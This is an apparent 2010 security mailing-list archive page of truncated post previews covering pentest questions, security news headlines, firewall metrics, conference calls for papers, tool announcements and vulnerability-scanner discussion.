By default NMAP will count SYN-ACK answers to SYN queries as open port.

Try running a connect scan (-sT) which runs through...

Re: Pentest - ISA server TAS (Aug 30)
Hi,

Having 50000 ports of the 65535 ports is highly unlikely. To me, the
result has high amount of false positive. To be really sure that the
ISA is exhibiting such a behavior, run nmap and wireshark and see to
it that the response is indeed coming from the ISA proxy and not from
any other device that is sitting in between your system and the ISA
proxy.

Hope that helps.

Cheers
TAS...

Re: Pentest - ISA server Ravipriya Thushara (Aug 30)
I too think there is an IPS at the network boundary other than an ISA
server. That's why it drops connections in both directions(IPS
inspects both inbound and outbound traffic). I'm interested in what
have over 50000 open ports. I have no idea about it and why is it
doing so.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and...

Re: Pentest - ISA server Paul Melson (Aug 30)
ISA Server is a proxy firewall, so TCP port scanning (3-way or SYN)
will result in lots of false positives like what you're seeing.
Libraries in the US are required to comply with CIPA, so the ISA
Server's primary purpose is most likely to filter adult web content.
It may also support remote access to the library's network, so rather
than trying to phone home from a compromised workstation (that is
probably turned off at close and rebooted...

Re: Pentest - ISA server Boyd, Chad (Aug 28)
Try scanning a Checkpoint 7.0+ system with the IPS blade running, and you're likely to see similar things.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT certs require a full practical examination in order to become...

Pentest - ISA server Kurt M. John (Aug 28)
Hey guys,

I have a question but I wanted to share this part with you first. I'm
doing a pentest for a client (scope includes several places including a
library) and its been all types of fun actually. Yesterday I posed as a
library patron. I went through about 3 library computers that all had
bios passwords on them but I finally found one that didn't. So I
rebooted the computer that had no bios password to backtrack(installed
on a usb key) and...

Re: WAF Testing..suggestions?? Dotzero (Aug 27)
Try waffit - http://code.google.com/p/waffit/source/checkout

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org...

RE: WAF Testing..suggestions?? DucNguyen (Aug 27)
Hi False,

attacks/suspicous traffic towards the weberver from my client?

==> You can generate traffic attacks by web assessment tools, recommend :
W3af, Websecurify, not recommend Acunetix because it fixed http header, WAF
so easy detect and block.

good to be the role of my test

You can try some images : OWASP Webgoat ; WebDojo ...

Search article of NSA : waf testing procedure .

-------------------------------------------
Regards,...

Info Security News — Carries news items (generally from mainstream sources) that relate to security.

Iran's Cyber Army Hacks 1, 000 US, British, French Gov't Websites InfoSec News (Aug 31)
http://english.farsnews.com/newstext.php?nn=8906081424

FARS News Agency
2010-08-30

TEHRAN (FNA)- An Iranian cyber group announced that it has hacked more
than 1,000 important governmental websites of the US, Britain and France
in protest at their support and financial aids to anti-Iran terrorist
groups.

"To commemorate the Day of Campaign against Terrorism and the martyrdom
anniversary of (former Iranian President Mohammad Ali)...

Darpa’s Star Hacker Looks to WikiLeak-Pr oof Pentagon InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/darpas-star-hacker-looks-to-wikileak-proof-the-pentagon/

By Spencer Ackerman
Danger Room
Wired.com
August 31, 2010

Tomorrow's WikiLeakers may have to be sneakier than just dumping
military docs onto a Lady Gaga disc. The futurists at Darpa are working
on a project that would make it harder for troops to funnel classified
material to WikiLeaks -- or to foreign governments. And that means if
you work...

State retiree data breached InfoSec News (Aug 31)
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached

By J.L. MILLER
The News Journal
August 31, 2010

DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's
benefits consultant, inadvertently posted personal information of about
22,000 state retirees on the Web, potentially exposing them to identity
theft for the rest of...

HP Holds Navy Network 'Hostage' for $3.3 Billion InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/hp-holds-navy-network-hostage/

By Noah Shachtman
Danger Room
Wired.com
August 31, 2010

Someday, somehow, the U.S. Navy would like to run its networks -- maybe
even own its computers again. After 10 years and nearly $10 billion,
many sailors are tired of leasing their PCs, and relying on a private
contractor to operate most of their data systems. Troops are sick of
getting stuck with inboxes that hold...

Focus on Secrecy Could Hamper Pentagon's Cybersecurity Plans InfoSec News (Aug 31)
http://threatpost.com/en_us/blogs/focus-secrecy-could-hamper-pentagons-cybersecurity-plans-083010

By Paul Roberts
Threatpost.com
08/30/2010

The former head of the Department of Homeland Security's Cyber Security
Division warns that the U.S. military's preoccupation with secrecy could
hamper efforts to get the upper hand in cyber security.

An article last week by the U.S Deputy Secretary of Defense put the U.S.
military's cybersecurity plans...

Obama to loosen rules on technology exports InfoSec News (Aug 31)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/30/AR2010083004278.html

By Howard Schneider
Washington Post Staff Writer
August 30, 2010

The Obama administration is overhauling the decades-old rules for the
export of sensitive military and other technology, jettisoning what
industry groups criticize as an antiquated "Cold War" set of regulations
for a more streamlined approach.

After a year-long review by officials at...

[Dataloss Weekly Summary] Week of Sunday, August 22, 2010 InfoSec News (Aug 31)
========================================================================

Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, August 22, 2010

5 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open
Security Foundation asks for contributions of new incidents and new data for...

IT Security Unleashes Employee Complaints InfoSec News (Aug 31)
http://www.informationweek.com/news/security/client/showArticle.jhtml?articleID=227101732

By Mathew J. Schwartz
InformationWeek
August 30, 2010

For 12% of CIOs, hearing complaints from employees over IT security
measures -- specifically, limits on their access to certain types of
websites or networks while using the office network -- is a common
occurrence. Meanwhile, 29% of CIOs say such gripes are at least
"somewhat common."...

CALL FOR PARTICIPATION-3rd Summer School on Network and Information Security (NIS'10) InfoSec News (Aug 29)
Forwarded from: Ioannis Askoxylakis <asko (at) ics.forth.gr>

**************************************************************************

SINCERE APOLOGIES IF YOU RECEIVE MULTIPLE COPIES OF THIS ANNOUNCEMENT

***************************************************************************
CALL FOR PARTICIPATION
3rd Summer School on Network and Information Security (NIS'10)
Jointly organized by ENISA and FORTH
13-17...

Pentagon considers preemptive strikes as part of cyber-defense strategy InfoSec News (Aug 29)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/28/AR2010082803849.html

By Ellen Nakashima
Washington Post Staff Writer
August 28, 2010

The Pentagon is contemplating an aggressive approach to defending its
computer systems that includes preemptive actions such as knocking out
parts of an adversary's computer network overseas - but it is still
wrestling with how to pursue the strategy legally.

The department is developing a...

Audit finds computer misuse at state employment agency InfoSec News (Aug 29)
http://www.charlotteobserver.com/2010/08/27/1645949/audit-finds-computer-misuse-at.html

By Michael Biesecker
newsobserver.com
Aug. 27, 2010

RALEIGH - Employees at the state agency tasked with helping unemployed
North Carolinians find jobs were instead using their government
computers to play games and burn copies of bootleg DVDs, a state audit
shows.

The Office of the State Auditor launched the investigation at the
Employment Security...

New DDoS Botnet Hits Nearly 200 Websites InfoSec News (Aug 29)
http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=227100032

By Kelly Jackson Higgins
DarkReading
Aug 26, 2010

A new botnet built for knocking websites offline has attacked mostly
Chinese and some U.S. sites, according to researchers.

About 90 percent of the command and control servers running YoyoDdos,
the nickname given the botnet by researchers at Arbor Networks who have
been studying and tracking...

3 areas where FUD needs to stop InfoSec News (Aug 29)
http://www.csoonline.com/article/606263/3-areas-where-fud-needs-to-stop

By Joan Goodchild
Senior Editor
CSO
August 26, 2010

There is a new breed of animal appearing in the infosec community,
according to Dr. Jimmy Blake, chief security officer for Mimecast, a
cloud-services company based in London, and host of the blog Cloud
Computing and Bad Behavior. The new breed is what he calls the
"attention monger" (he actually used a more...

Linux Advisory Watch: August 27th, 2010 InfoSec News (Aug 29)
+----------------------------------------------------------------------+
| LinuxSecurity.com Linux Advisory Watch |
| August 27th, 2010 Volume 11, Number 35 |
| |
| Editorial Team: Dave Wreski <dwreski () linuxsecurity com> |
| Benjamin D. Thomas <bthomas () linuxsecurity...

Gareth Williams: 'backroom boy' spy was really a high-flier InfoSec News (Aug 29)
http://www.telegraph.co.uk/news/uknews/crime/7969595/Gareth-Williams-backroom-boy-spy-was-really-a-high-flier.html

By Gordon Thomas
Telegraph.co.uk
29 Aug 2010

The Government Communications Headquarters in Cheltenham is Britain's
last great secret. Now it is in the focus of intense speculation among
its stunned staff. Never before has one of their own been murdered. In
GCHQ's cafes, the seating area around the lawn at the core of the...

Firewall Wizards — Tips and tricks for firewall administrators

Online Binary Planting Exposure Test Lists (Sep 02)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

Re: UPnP part of attack surface ArkanoiD (Aug 31)
It was pretty obvious from the very beginning that UPnP is evil gaping hole.

:-)

And actually i've never seen a reason to keep it enabled.

UPnP part of attack surface travis+ml-firewalls (Aug 31)
http://it.slashdot.org/it/08/01/14/1319256.shtml

One reason I'm interested in an authenticated way to do firewall
rule changes with DFD...

Re: In search of Firewalls KPIs pkc_mls (Aug 31)
Le 8/12/2010 11:07 PM, saumitra prabhudesai a écrit :

Hi,

Can you please describe a little bit more what you plan to do, which
models are involved, which scenarios, etc ?

The KPI are the same for several firewall vendors : cpu, memory, number
of sessions, throughput, etc.

Re: a cutting-edge open-source network security project travis+ml-firewalls (Aug 21)
Let the heresy begin! ;-)

Well, I was thinking of packet scrubbing in particular, with min-ttl
restrictions, because that can wreak havoc with traceroute. Being
able to easily turn it off for an IP for a quick traceroute is handy.

Any good Boeing 747 can already get you where you need; why would
anyone be interested in a free solar-powered engine?

Also, not all adversaries are conducting network attacks; perhaps you
want to block people who...

Re: covert timing channel data travis+ml-firewalls (Aug 21)
This is my timing side-channel link collection:
http://www.subspacefield.org/security/security_concepts/index.html#tth_sEc31.2.4

I should probably break that section up into remote & local, but I'm
already 3 levels deep :-)

I'd definitely check out "remote timing attacks are practical", I think
that one has the most information for your case.

You might want to check out Bernstein's AES attacks, or a statistician,
to characterise...

Re: covert timing channel data Melissa Stockman (Aug 21)
Thanks Travis but again this is not the data that I'm looking for.

The timing attacks described in your link are based on a single malicious
entity extracting data from a non compromised system by looking at timing
information.

The type of covert channel that I'm simulating has two malicious entities (a
sender and a receiver). One residing on a higher level security system and
one residing on a lower level security system. The entity on the...

Ruxcon 2010 Final Call For Papers cfp (Aug 21)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

In search of Firewalls KPIs Marcin Antkiewicz (Aug 21)
Saumitra,

KPIs are metrics. Good metrics should be Specific, Measurable,
Actionable, Relevant, and Timely (SMART people call it).
A simple way of looking at firewall metrics is by placing them into
environmental,operational and strategic categories.

Environmental measurements deal with power/cooling consumption, rack
footprint, cabling/media, location, power sources, etc.

Operational stats deal with capacity
(disk/CPU/states/licenses/interface...

Re: In search of Firewalls KPIs saumitra prabhudesai (Aug 18)
Thank you very much Tim. I'll start with the following as of now.

Thanks,
Saumitra

--- On Tue, 17/8/10, Tim Eberhard <xmin0s () gmail com> wrote:

From: Tim Eberhard <xmin0s () gmail com>
Subject: Re: [fw-wiz] In search of Firewalls KPIs
To: "Firewall Wizards Security Mailing List" <firewall-wizards () listserv icsalabs com>
Date: Tuesday, 17 August, 2010, 9:18 AM

I would suggest monitoring the following:

Number of...

Re: In search of Firewalls KPIs Tim Eberhard (Aug 17)
I would suggest monitoring the following:

Number of total sessions
Session Ramp rate
CPU (Flow and task)
Interface stats
Policy drops/screen drops
Temperatures

Depending on the model (higher end boxes) you also might want to monitor the
'get asic d' command. Traffic types greatly impact the capacity of these
boxes.

I hope this helps.

-Tim Eberhard

In search of Firewalls KPIs saumitra prabhudesai (Aug 16)
Hi All,

I am in search of the essential KPIs to be monitored for Juniper Netscreen Firewalls. After the identification of these
KPIs, I want to go ahead for capacity planning & performance optimization of these firewalls. Any piece of advise will
help!

Thanks,
Saumitra

Re: Intranet or intranet? Gautier . Rich (Aug 06)
While I've always spelled it as Intranet everywhere I've written it - I am now completely convinced that I have been in
the wrong for many, many years.

It is an intranet - not The Intranet. If you want to name it - then you can capitalize it.....e.g. Behmnet

Rich Gautier
Sr. Product Architect
Kadix Systems
Office: 571-226-8828
Cell: 703-231-2156

From: firewall-wizards-bounces () listserv icsalabs com [mailto:firewall-wizards-bounces ()...

Re: Intranet or intranet? Brian Loe (Aug 06)
Depends on context. If you are writing "the intranet" that you would
not capitalize it. If, however, you are writing "Company ABC's
Intranet" then you would. The latter being a proper noun and such.

Re: Intranet or intranet? John Morrison (Aug 06)
Jeff,

The noun internet means a network of networks. It is a group of
connected networks - an internetwork. The I in IP standards for
internet. The capitalisation of Internet is used for THE Internet. It
is a proper noun in this case. (See -
http://www.webster-dictionary.org/definition/internet
Which says "Internet - (Note: capital "I"). The Internet is the
largest internet (with a small "i") in the world)

Following...

Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Online Binary Planting Exposure Test ACROS Security Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

Released SpyBHORemover 2.5 Nagareshwar Talekar (Aug 25)
Hi all,

SpyBHORemover 2.5 is released to public now. SpyBHORemover (previously
called BHORemover) is the [FREEWARE] advanced tool to explore and
eliminate malicious BHO's from the system.

http://securityxploded.com/bhoremover.php

More about SpyBHORemover:
--------------------------------------------
BHO stands for 'Browser Helper Objects' which are plugins written for
'Internet Explorer' to enhance its capabilities. Often this...

t2′10 Challenge to be released 2010-08- 28 10:00 EEST Tomi Tuominen (Aug 24)
Hi,

Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!

Now is your chance to join the past elites (http://t2.fi/challenge/) by...

[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN! Leonardo Buonsanti (Aug 20)
Greetings everyone!

We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations' are officially open!

Early bird offers are available! Hurry up!

This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!

Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration

All info about the event can be found at:...

Better Security Through Sacrificing Maidens Pete Herzog (Aug 19)
Hi,

I thought that this might be an interesting read for web developers.
It outlines a major problem with modern security practice and suggests
how to address it.

https://www.infosecisland.com/blogview/6646-Better-Security-Through-Sacrificing-Maidens.html

Sincerely,
-pete.

Ruxcon 2010 Final Call For Papers cfp (Aug 19)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

Re: winAUTOPWN v2.3 Released Brad Causey (Aug 11)
The comments are from folks that don't know what they are doing. My
understanding is that this tool isn't for newcomers to the security
realm, nor is the tool for script kiddies.
As with any open source security tool, use it with caution, and never
use anything you don't fully understand.

-Brad Causey
CISSP, MCSE, C|EH, CIFI, CGSP

http://www.owasp.org

Re: winAUTOPWN v2.3 Released ghost (Aug 11)
Damning how? It's obviously a script kiddie tool, so that leaves...

The genius that doesn't realize his AV is going off on the included
exploits and thinks its infected?

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: winAUTOPWN v2.3 Released Jamie Riden (Aug 11)
Well, metasploit is "full of viruses" by that criterion as well - if
your AV tool doesn't moan about something like this then you need a
new AV tool :)

Having said that, I haven't downloaded it and tried it myself, but do
it on an isolated VM if you're worried.

cheers,
Jamie

Re: winAUTOPWN v2.3 Released Fred Concklin (Aug 09)
Comments prove to be damning.

http://www.darknet.org.uk/2009/04/winautopwn-windows-autohacking-tool/

"QUAKER DOOMER" <quakerdoomer () inbox lv> wrote:

winAUTOPWN v2.3 Released QUAKER DOOMER (Aug 08)
Dear all,

This is to announce release of winAUTOPWN version 2.3
This version covers remote exploits up-till July 2010.
A few web RFI exploits will be added in the next Unpolished Sita Release.
A complete list of all Exploits in winAUTOPWN is available in CHANGELOG.TXT

Also, in this version :
BSDAUTOPWN has been upgraded to version 1.1. This BSD equivalent for winAUTOPWN now contains
almost all exploits which exist in winAUTOPWN except for...

2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers Carlos Serrão (Aug 02)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

Call for Papers

Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to developed new and flexible...

[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!

This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!

HITB CFP: http://cfp.hackinthebox.org/

===

Venue: Crowne Plaza Mutiara Kuala Lumpur...

Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.

Rooted CON 2011 - Call for Papers Román Ramírez (Sep 02)
Rooted CON 2011 - Call for Papers

-=] About Rooted CON

Rooted CON is a security congress which will be held in Madrid (Spain)
from 3 to 5 March 2011, whose spectrum of participants ranging from
students to state forces and secret services, through professionals of
the security market, lawyers, or even technology enthusiasts (and others).

-=] Type of Presentations

The congress accepts two kinds of presentations:

- Fast talks: 20 minutes.
-...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
Indeed. How about car analogies, though?

/mz

SILICAU Lightning Demo (Wireless key cracking) Mark Wuergler (Sep 01)
List,

Today's lightning demo will take a look at the wireless key cracking
capabilities of SILICAU.
Come watch us crack WEP, WPA1/2, and LEAP authentication!

Immunity will be doing a Lightning Demo today, Wednesday September 1st at
3:00p EDT (UTC - 4), we expect the demo to last between 15 and 20
minutes. Space is limited to 20 and invites will be issued on a first
come / first served basis. Invites for the demo will be sent at
approximately...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Fyodor (Sep 01)
In China they've been pushing Multi-Level Protection Scheme (MLPS),
which is somewhat makes sense, when it is not at personal but at
enterprise level (i.e. you don't want your enemy country enterprises
to come and secure your critical infrastructure and plant backdoors as
they go :))

The comparison with medical industry is ridiculous. Not only the med.
industry doesn't serve its main purpose (healing), but there is also
one key difference: the...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
If you look at the archives of attrition.org, I actually suspect that
the charlatan fraction is about as strong as always, and not
particularly threatening to the legitimate business; and, given that,
as that report sensibly acknowledges, even fairly reputable
certifications do very little to generate highly qualified security
personnel, I doubt any action along these lines would make much of a
difference.

The real problem seems to be that the...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
Yeah, I remember that one.

Between this and the continued push for "private-public partnerships"
(i.e., companies letting the government assess their
cyber-preparedness, etc), I am getting vaguely uncomfortable with the
attention the industry is getting of recent - despite the fact that
little or nothing has changed in the last 5-6 years, too.

It's not as much that I suspect the government has questionable
motives, of course; this is...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) dan (Sep 01)
<disclaimer>I serve on that CSIS Commission</disclaimer>

Certification is coming, like it or not. I do not like it,
but it is coming. The driver is a direct consequence of,
and a direct confirmation that, the demand for security
expertise exceeds the supply which makes the charlatan
fraction rise especially as legal liability looks ever
more likely to be serious. Before we have a long-winded
argument, take a look at

www.nbise.org...

Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Aug 31)
This is probably somewhat interesting; a prominent quote from this
paper, dissing security certifications, is making rounds for a while -
but the rest of the paper is actually pretty scary:

http://csis.org/files/publication/100720_Lewis_HumanCapital_WEB_BlkWhteVersion.pdf

In essence, looks like the commission is simultaneously trying to
criticize the current regime of security certifications (probably
rightly so), and - very bizarrely - use...

SILICAU Movie dave (Aug 26)
You can watch Mark Hijack a twitter/facebook session here.
http://partners.immunityinc.com/movies/Lightning_Demo_SilicaU_01.mp4

The key thing isn't really that this is possible (I assume if you're on this list you
know it is possible). The key thing is that it's two clicks.

-dave

Ekoparty classes! dave (Aug 25)
Immunity will be doing two classes at Ekoparty this September. You should sign up,
especially if you're going to go to Ekoparty (which you should)!

Breaking Windows
September 14th and 15th

Python for Hackers
September 13th and 14th

Realistically, both classes should be titled: "Things you should know that we had to
learn the hard way". That's what almost all classes at conferences should be titled,
except, in Ekoparty's case, in...

t2′10 Challenge to be released 2010 -08-28 10:00 EEST Tomi Tuominen (Aug 25)
Hi,

Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!

Now is your chance to join the past elites (http://t2.fi/challenge/) by...

SOURCE Barcelona 2010 Speaker List Christien Rioux (Aug 23)
SOURCE Barcelona

September 21-22, 2010

Museu Nacional D’art de Catalunya

www.sourceconference.com

Boston - Barcelona - Seattle

SOURCE brings computer and IT security professionals and practitioners
together in an intimate and personal environment to discuss the
security industry’s most important issues, technologies, and business
trends. SOURCE attendees experience two days of intense 50 minute
sessions taught by top security experts....

PAPER: Security Mitigations for Return-Oriented Programming Attacks Piotr Bania (Aug 23)
ABSTRACT

With the discovery of new exploit techniques, new protection mechanisms are
needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR
(Address Space Layout Randomization) created a significantly more difficult
environment for vulnerability exploitation. Attackers, however, have
recently developed new exploitation methods which are capable of bypassing
the operating system's security protection mechanisms. In this...

White Phosphorus dave (Aug 20)
Boom! It's Friday, at 4pm, and no doubt you want to watch a short video of Alex
McGeorge demonstrating the White Phosphorus TCP forwarder and Wireshark exploit.

That movie is here!
http://partners.immunityinc.com/movies/Lightning_Demo_WP01.mp4

Enjoy!

-dave

Re: X11 -> Root? (Qubes square rooted) Brad Spengler (Aug 19)
Hello list for lions,

Grab yourself your beverage of choice and some anticipatory popcorn;
this will take a while.

So every year or so we get some overly confident zealot shot down on DD
(any SELinux zealots still out there?) Going with the tide of
security, this year's program seems to center around a new topic:
virtualization, particularly from the person who brought us the only
100% undetectable (*) rootkit. The internet hype machine seems...

PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.

Re: LAN Virus outbreak Procedures Craig Freyman (Sep 02)
How big is the environment?

On Thu, Sep 2, 2010 at 9:27 AM, Tyler Robinson <pcimpressions () gmail com>wrote:

Re: LAN Virus outbreak Procedures Pat (Sep 02)
I used a notable pen drive. Boot Linux install f-prot for Linux. Mount and
scan the drives. This works great on root kits

Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
microsofts firewall with GP and just open exceptions for the applicatoins
that need it or run another piece of...

Re: LAN Virus outbreak Procedures Butturini, Russell (Sep 02)
I've had much success with VLANing the affected systems off from the rest of the network and deploying some kind of
local "cleanup" machine that's hardened to work on the remediation process.

From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Tyler
Robinson
Sent: Thursday, September 02, 2010 10:28 AM
To: PaulDotCom Security Weekly Mailing List
Subject: [Pauldotcom] LAN...

LAN Virus outbreak Procedures Tyler Robinson (Sep 02)
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
microsofts firewall with GP and just open exceptions for the applicatoins
that need it or run another piece of software. I have a massive infection
that i cannot track down our Eset is catching them but my network is nothing
but...

Re: Brucon Robin Wood (Sep 02)
This is the one we all stayed at last year

http://www.husapresidentpark.com/

Not too far from station, ok bar, standard hotel prices. Quite nice
hotel unless you got the room where the bathroom flooded, can't
remember who got that one.

I'll be there for the VOIP class so see you there.

Robin

Brucon Nils (Sep 02)
Hi,
anyone going to Brucon and eventually to one of the classes prior?
Any hotel recommendations?
I'd like to go there the Tuesday prior to the class and check in late
afternoon.

Nils

Re: vulnerability scanners Francois Lachance (Sep 02)
Forrester recently published a research paper titled "The Forrester Wave™:
Vulnerability Management, Q2 2010" (
http://www.forrester.com/rb/Research/wave%26trade%3B_vulnerability_management%2C_q2_2010/q/id/56932/t/2).
It costs $1,740 USD to purchase that report (ouch!). I am fortunate enough
to work for a corporation that has a membership with Forrester. Take a look
at the executive summary to give you an idea of which vendors they...

Re: RFID: What to get? Larry Pesce (Sep 01)
They sure did. Cleared out my local 'Shack of them.

- L

Re: RFID: What to get? Bill Swearingen (Sep 01)
Radio Shack had some Arduino compatible Parallax RFID readers (with tags)
for super cheap ($5 or something?) a few months ago. You should check your
local stores, they are in the parts bins.

http://www.parallax.com/rs

Re: RFID: What to get? Bacon Zombie (Sep 01)
Hey,

I picked up a Proxmark3 <http://cq.cx/proxmark3.pl> cheap on the last day of
26c3 <http://events.ccc.de/congress/2009/wiki/Proxmark3>, it does both
low-(~125 kHz) or high-(~13.56 MHz) frequency RFID tag.

And still have not gotten around to playing / using it properly, but we are
kicking off a RFID night at Dublin Hackerspace so that should force me to
start learning how to us to.

Some of the other in the space have the...

Re: RFID: What to get? Robin Wood (Sep 01)
I keep telling myself that my free time will go up but that never
happens either!

Re: RFID: What to get? Michael Miller (Sep 01)
I keep on telling my self that the cost will come down. That has yet to happen.

Re: Vulnerability Scanners Albert R. Campa (Sep 01)
A nessus pro feed will let you do that same DOD audit in a non intrusive way
via credentialed scan. Dont know how Nexpose or others work in that regard,
i assume the same way.

__________________________________
Albert R. Campa

On Wed, Sep 1, 2010 at 7:14 AM, Herndon Elliott <alabamatoy () gmail com>wrote:

Re: Vulnerability Scanners Herndon Elliott (Sep 01)
...

gold disc and SRRs. http://iase.disa.mil/stigs/index.html and
http://iase.disa.mil/stigs/faq.html

Pros: Free, updated, widely used throughout DoD, produce useable results,
all moving slowly to XML basis and VMS output
Cons: Clunky, quirky (but pretty effective), requires DoD PKI cert for
access, some of the checks are manual/interview

Caution, do NOT use the "remediate" button in gold disc or you *will* brick
the box!

Herndon...

Re: vulnerability scanners Albert R. Campa (Aug 31)
This is true. When you said Core, i thought, do they have a vuln scanner?

I installed Nessus home and Nexpose community on BT4 and did some scanning
and comparison. I havent had time to put everything together, but as someone
stated it would be good to test them out.

__________________________________
Albert R. Campa

Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

Re: honeypot needed for waf testing Valdis . Kletnieks (Aug 24)
On Mon, 23 Aug 2010 08:21:29 PDT, false said:

There's tools to do specifically that. However, you probably already have many
